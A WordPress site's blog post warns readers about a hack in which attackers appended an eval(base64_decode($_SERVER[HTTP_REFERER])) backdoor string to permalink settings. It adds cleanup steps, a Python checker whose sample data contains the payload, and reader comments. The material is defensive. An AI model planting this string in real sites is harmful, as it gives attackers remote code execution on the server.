HD-Report proudly runs on WordPress; however, due to the popularity of the open source platform, it is frequently a target of hackers. We thought we would post this message to help out and warn other sites that may be vulnerable.
Brief overview:
Somehow a hacker was able to access the administration tools. A custom structure string coded as “/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/” was placed at the end of each permalink.
To fix this, you should first change your password. Then, delete suspected users who may be using the login “admin” or another name that looks suspicious. Third, go to the Permalinks options and reset them to your preferred settings. You may notice the “Custom Structure” has the malicious string.
To prevent this from happening to your WordPress site, update to the latest version 2.8, be careful of new users, and back up your files frequently!
Here are a couple of links to the WordPress forum which go into the issue in more detail:
http://wordpress.org/support/topic/307588
http://wordpress.org/support/topic/307518
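For checking a site's permalink settings against the kind of string described above, here is an added example (not part of the original post or of WordPress itself). It assumes the `permalink_structure`, `category_base` and `tag_base` option values have already been read from the site's options table; the function names and sample rows are constructed for illustration.

```python
import re

# WordPress's standard permalink structure tags, used as an allow-list.
ALLOWED_TAGS = {"year", "monthnum", "day", "hour", "minute", "second",
                "post_id", "postname", "category", "author"}

# Tokens that have no place in a URL pattern; all appear in the string quoted in the post.
CODE_MARKERS = ["eval(", "base64_decode", "${", "$_SERVER", "HTTP_REFERER"]

TAG_RE = re.compile(r"%([^%/]*)%")
# Assumption: literal parts of a permalink use only these plain URL path characters.
LITERAL_RE = re.compile(r"^[A-Za-z0-9._/-]*$")

def check_permalink_structure(value):
    """Return a list of findings; an empty list means the value looks clean."""
    findings = ["code marker: " + m for m in CODE_MARKERS if m in value]
    for tag in TAG_RE.findall(value):
        if tag not in ALLOWED_TAGS:
            findings.append("unknown tag: %" + tag + "%")
    # Whatever remains once the %tags% are removed must be plain path text.
    if not LITERAL_RE.match(TAG_RE.sub("", value)):
        findings.append("unexpected characters outside tags")
    return findings

def audit_options(options):
    """Check the permalink-related options; return only those with findings."""
    report = {}
    for name in ("permalink_structure", "category_base", "tag_base"):
        findings = check_permalink_structure(options.get(name, ""))
        if findings:
            report[name] = findings
    return report

# Constructed sample: a normal structure with the string from the post appended.
INFECTED = {
    "permalink_structure": "/%year%/%monthnum%/%postname%/"
                           "%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/",
    "category_base": "topics",
}
CLEAN = {"permalink_structure": "/%year%/%monthnum%/%postname%/", "tag_base": ""}

if __name__ == "__main__":
    for label, opts in (("infected", INFECTED), ("clean", CLEAN)):
        print(label, audit_options(opts))
```

A non-empty report means the Permalinks settings should be reset as described above; the allow-list catches unknown `%...%` tags even when none of the listed code markers are present.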
I thought that was over-hyped at the time, until many sites started getting hacked. In the last couple of weeks it has been happening a lot.
We were also hacked. Check your uploads directory–you’ll most likely find a series of new folders there, probably buried in year and month folders, containing websites selling pharmaceuticals and warez.
Sucks man. You should report them to Interpol.